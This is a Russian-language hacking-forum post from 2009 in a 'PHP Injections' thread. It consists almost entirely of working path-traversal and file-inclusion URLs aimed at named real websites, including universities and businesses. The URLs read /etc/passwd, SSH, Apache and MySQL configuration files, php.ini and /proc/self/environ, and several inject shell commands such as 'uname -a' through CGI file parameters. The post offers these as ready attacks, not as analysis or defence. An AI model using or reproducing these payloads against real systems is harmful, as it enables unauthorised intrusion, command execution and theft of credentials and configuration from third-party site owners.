Тема: PHP Иньекции
Показать сообщение отдельно

  #2  
Старый 21.06.2009, 04:16
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


По умолчанию
Немножко инъекций и читалок, включая слепые, скорее всего многого не было, т.к. пока не видел еще сканеров, когда ошибки не выводятся:

Код:
http://www.pudasjarvi.fi/deutsch/index.php?file=/etc/passwd
http://www.pudasjarvi.fi/deutsch/index.php?file=/usr/local/apache/logs/access_log
http://www.pudasjarvi.fi/deutsch/index.php?file=/usr/local/apache/logs/error_log
----------------------------
http://cortonabec05.sns.it/view.php?file=../../../../../../../../../../../../../../../../etc/passwd
http://cortonabec05.sns.it/view.php?file=../../../../../../../../../../../../../../../../etc/ssh/sshd_config
http://cortonabec05.sns.it/view.php?file=../../../../../../../../../../../../../../../../etc/apache/conf/httpd.conf
http://cortonabec05.sns.it/view.php?file=../../../../../../../../../../../../../../../../etc/mysql/my.cnf
-----------------------------
http://www.stilmoebel.org/index.php?page=../../../../../../../../../../etc/passwd
http://www.stilmoebel.org/index.php?page=../../../../../../../../../../etc/ssh/sshd_config
http://www.stilmoebel.org/index.php?page=../../../../../../../../../../etc/my.cnf
http://www.stilmoebel.org/index.php?page=../../../../../../../../../../usr/bin/grep

-----------------------------
http://www.kurier-melchior.de/index.php?page=../../../../../../../../../../etc/passwd
http://www.kurier-melchior.de/index.php?page=../../../../../../../../../../etc/ssh/sshd_config
http://www.kurier-melchior.de/index.php?page=../../../../../../../../../../etc/apache2/httpd.conf
http://www.kurier-melchior.de/index.php?page=../../../../../../../../../../etc/mysql/my.cnf
http://www.kurier-melchior.de/index.php?page=../../../../../../../../../../etc/proftpd/modules.conf

-----------------------------
http://burg-pension.de/index.php?page=../../../../../../../../../../etc/passwd
http://burg-pension.de/index.php?page=../../../../../../../../../../etc/ssh/sshd_config
http://burg-pension.de/index.php?page=../../../../../../../../../../etc/apache2/httpd.conf
http://burg-pension.de/index.php?page=../../../../../../../../../../etc/mysql/my.cnf
http://burg-pension.de/index.php?page=../../../../../../../../../../etc/proftpd/modules.conf

-----------------------------
http://www.bird.org.tw/index.php?block=../../../../etc/passwd
http://www.bird.org.tw/index.php?block=../../../../etc/ssh/sshd_config
-----------------------------
http://www.funnelwebcentral.org/articles.php?action=article&article=../../../../../etc/passwd
http://www.funnelwebcentral.org/articles.php?action=article&article=../../../../../etc/ssh/sshd_config
http://www.funnelwebcentral.org/articles.php?action=article&article=../../../../../etc/mysql/my.cnf
http://www.funnelwebcentral.org/articles.php?action=article&article=../../../../../etc/proftpd/modules.conf
-----------------------------
http://adplug.sourceforge.net/library/entry.php?file=../../../../../../../../../../../../../../../../../etc/passwd
http://adplug.sourceforge.net/library/entry.php?file=../../../../../../../../../../../../../../../../../etc/ssh/sshd_config
http://adplug.sourceforge.net/library/entry.php?file=../../../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf
http://adplug.sourceforge.net/library/entry.php?file=../../../../../../../../../../../../../../../../../etc/php.ini
http://adplug.sourceforge.net/library/entry.php?file=../../../../../../../../../../../../../../../../../etc/my.cnf
-----------------------------
http://www.tonie.net/index.php?p=../../../../../../../etc/passwd
http://www.tonie.net/index.php?p=../../../../../../../etc/ssh/sshd_config
http://www.tonie.net/index.php?p=../../../../../../../etc/apache2/httpd.conf
http://www.tonie.net/index.php?p=../../../../../../../etc/mysql/my.cnf
http://www.tonie.net/index.php?p=../../../../../../../etc/vsftpd.conf
------------------------------
-----------------------------
http://www.csc.kth.se/utbildning/kth/kurser/DD2390/intnet06/index.php?file=../../../../../../../../../../../../../../../../etc/passwd
http://www.csc.kth.se/utbildning/kth/kurser/DD2390/intnet06/index.php?file=../../../../../../../../../../../../../../../../etc/ssh/sshd_config
http://www.csc.kth.se/utbildning/kth/kurser/DD2390/intnet06/index.php?file=../../../../../../../../../../../../../../../../etc/php/php.ini
http://www.csc.kth.se/utbildning/kth/kurser/DD2390/intnet06/index.php?file=../../../../../../../../../../../../../../../../usr/bin/grep
-----------------------------
http://www.colombopage.com/cgi-bin/show_ach.cgi?../../../../../../../../../../../etc/passwd
http://www.colombopage.com/cgi-bin/show_ach.cgi?../../../../../../../../../../../proc/self/environ
http://www.colombopage.com/cgi-bin/show_ach.cgi?../../../../../../../../../../../etc/ssh/sshd_config
-----------------------------
http://www.dahop.org/dhedit/edittag.cgi?file=../../../../../../../etc/passwd
http://www.dahop.org/dhedit/edittag.cgi?file=../../../../../../../proc/self/environ
http://www.dahop.org/dhedit/edittag.cgi?file=../../../../../../../etc/httpd/conf/httpd.conf
http://www.dahop.org/dhedit/edittag.cgi?file=../../../../../../../usr/local/etc/php.ini
http://www.dahop.org/dhedit/edittag.cgi?file=../../../../../../../etc/my.cnf
http://www.dahop.org/dhedit/edittag.cgi?file=../../../../../../../etc/logrotate.d/vsftpd.log
-----------------------------
http://www.argad.org/cgi-bin/sito.cgi?file=../../../../../../../etc/passwd
http://www.argad.org/cgi-bin/sito.cgi?file=../../../../../../../usr/local/apache/logs/access_log
http://www.argad.org/cgi-bin/sito.cgi?file=../../../../../../../usr/local/apache/logs/error_log
http://www.argad.org/cgi-bin/sito.cgi?file=../../../../../../../usr/local/apache/conf/httpd.conf
http://www.argad.org/cgi-bin/sito.cgi?file=../../../../../../../usr/local/etc/httpd/conf/httpd.conf
-------------------------------
http://www.toshin.com/cgi-bin/news/headline/view.cgi?File=|uname%20-a|
http://shimizu.dyndns.tv/simizu-t/cgi-bin/link.cgi?file=|uname%20-a|
http://f22.aaa.livedoor.jp/~gbwars/cgi-bin/gbw/turn/chdata.cgi?file=|uname%20-a|
http://www.nurs.or.jp/~siizuka/cgi-bin/download.cgi?file=|uname$IFS-a|
-----------------------------
http://www.sub.uni-goettingen.de/cgi-bin/vlib/news_arch.cgi?file=../../../../../../../etc/passwd
http://www.sub.uni-goettingen.de/cgi-bin/vlib/news_arch.cgi?file=../../../../../../../proc/self/environ
http://www.sub.uni-goettingen.de/cgi-bin/vlib/news_arch.cgi?file=../../../../../../../etc/apache2/httpd.conf
http://www.sub.uni-goettingen.de/cgi-bin/vlib/news_arch.cgi?file=../../../../../../../etc/php5/apache2/php.ini
http://www.sub.uni-goettingen.de/cgi-bin/vlib/news_arch.cgi?file=../../../../../../../usr/bin/grep
-----------------------------
http://www.lapianca.com/cgi-bin/sito_lp.cgi?file=||&nav=../../../../../../../etc/passwd
http://www.lapianca.com/cgi-bin/sito_lp.cgi?file=||&nav=../../../../../../../proc/self/environ
http://www.lapianca.com/cgi-bin/sito_lp.cgi?file=||&nav=../../../../../../../etc/ssh/sshd_config
http://www.lapianca.com/cgi-bin/sito_lp.cgi?file=||&nav=../../../../../../../etc/php5/apache2/php.ini
http://www.lapianca.com/cgi-bin/sito_lp.cgi?file=||&nav=../../../../../../../etc/php5/cgi/php.ini
http://www.lapianca.com/cgi-bin/sito_lp.cgi?file=||&nav=../../../../../../../etc/mysql/my.cnf
http://www.lapianca.com/cgi-bin/sito_lp.cgi?file=||&nav=../../../../../../../etc/proftpd/modules.conf
 
Ответить с цитированием